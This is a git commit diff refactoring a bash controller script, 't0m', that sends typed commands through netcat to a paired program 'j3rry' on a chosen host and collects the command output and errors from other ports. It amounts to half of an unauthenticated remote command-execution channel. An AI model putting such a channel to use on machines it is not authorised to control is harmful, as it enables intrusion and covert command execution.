Refractored t0m to have cleaner code, migrated from t0m directory to /tmp handling

diff --git a/t0m b/t0m
--- a/t0m
+++ b/t0m
@@ -7,77 +7,38 @@ if [[ "$ip" == "" ]] ; then
 	ip="localhost"
 fi
 
-outputport=12005
-inputport=12006
-errorport=12007
-d="/home/$USER/t0m"
-dir="$d/$ip"
-inputfile="$dir/t0m.inp"
-errorfile="$dir/t0m.err"
+outputport=12005 # sends commands to j3rry
+inputport=12006 # receives output of the command executed on j3rry
+errorport=12007 # receives error of the command executed on j3rry
 
+inputfile="/tmp/t0m.inp" # stores inputport result
+errorfile="/tmp/t0m.err" # stores errorport result
 
-if [ -d "$d" ]; then
-	echo "[S] $d exits."
-else
-	echo -n "[S] $d does not exists, creating..."
-	mkdir "$d"	
-	echo "Done."
-fi
+(touch "$inputfile" && echo "" > "$inputfile") || echo "[-] Could not set up $inputfile..."
+(touch "$errorfile" && echo "" > "$errorfile") || echo "[-] Could not set up $errorfile..."
 
-
-if [ -d "$dir" ]; then
-	echo "[S] $dir exits."
-else
-	echo -n "[S] $dir does not exists, creating..."
-	mkdir "$dir"	
-	echo "Done."
-fi
-
-
-if [ -f "$inputfile" ]; then
-	echo -n "[S] $inputfile exits, wiping..."
-	echo "" > "$inputfile"
-	echo "Done."
-else
-	echo -n "[S] $inputfile does not exists, creating..."
-	touch "$inputfile"
-	echo "Done."
-fi
-
-
-if [ -f "$errorfile" ]; then
-	echo -n "[S] $errorfile exits, wiping..."
-	echo "" > "$errorfile"
-	echo "Done."
-else
-	echo -n "[S] $errorfile does not exists, creating..."
-	touch "$errorfile"
-	echo "Done."
-fi
-
-
-
-echo "[S] Input port: $inputport"
-echo "[S] Output port: $outputport"
-echo "[S] Error port: $errorport"
-
-echo "[S] Dialog window on port: $outputport"
 while :
 do
 	echo "[S] Options:"
 	echo "[S] 	1 output a command to j3rry"
 	echo "[S]	2 display previous command input from j3rry"
 	echo "[S]	3 exit the program"
+
 	read -p ":" usr
+	
 	if [ $usr -eq 3 ];then
 		break
+
 	elif [ $usr -eq 2 ]; then
 		clear
 		cat "$inputfile"	
 		cat "$errorfile"
+
 	elif [ $usr -eq 1 ]; then
+
 		echo "[S] Please input the command you want to execute!"
 		read -p "[S] :" command
+
 		echo "[S] Sending $command, to $ip on $outputport"
 		echo "$command" | nc "$ip" "$outputport"
 		echo "[S] Command sent!"
@@ -90,7 +51,10 @@ do
 		echo "[S] Option inputted is invalid!"
 	fi
 done
-
+echo "Closing t0m..."
+rm -f "$inputfile"
+rm -f "$errorfile"
+pkill -P $$
 
 exit 0
 
